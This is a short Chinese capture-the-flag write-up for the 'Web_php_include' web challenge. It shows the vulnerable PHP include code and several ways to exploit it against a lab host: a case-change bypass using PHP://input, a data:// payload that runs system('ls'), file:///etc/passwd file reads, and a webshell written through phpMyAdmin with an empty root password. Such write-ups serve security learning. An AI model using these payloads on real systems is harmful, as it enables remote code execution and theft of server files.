攻防世界(web篇)---Web_php_include

文章目录

  • 攻防世界(web篇)---Web_php_include
  • 题目
  • hello传值
  • phpmyadmin写马
  • 大写绕过 PHP://input
  • data://
  • file://协议

攻防世界(web篇)—Web_php_include

题目


show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

hello传值

http://111.200.241.244:57895/?page=http://127.0.0.1/?hello=

http://111.200.241.244:57895/?page=http://127.0.0.1/?hello=

phpmyadmin写马

路径扫描能找到phpmyadmin

攻防世界(web篇)---Web_php_include_第1张图片

账号root 密码为空

phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马

show variables like "secure_file_priv";

攻防世界(web篇)---Web_php_include_第2张图片

传成功

select ""into outfile '/tmp/1.php'

攻防世界(web篇)---Web_php_include_第3张图片

测试

攻防世界(web篇)---Web_php_include_第4张图片

大写绕过 PHP://input

php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行

利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码:

攻防世界(web篇)---Web_php_include_第5张图片

data://

http://111.200.241.244:59458/?page=data://text/plain,
http://111.200.241.244:59458/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=

file://协议

用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响

即file:// [文件的绝对路径和文件名]

http://111.200.241.244:59458/?page=file:///etc/passwd

你可能感兴趣的:(Vulnhub练习,#,WEB,php,web安全,开发语言)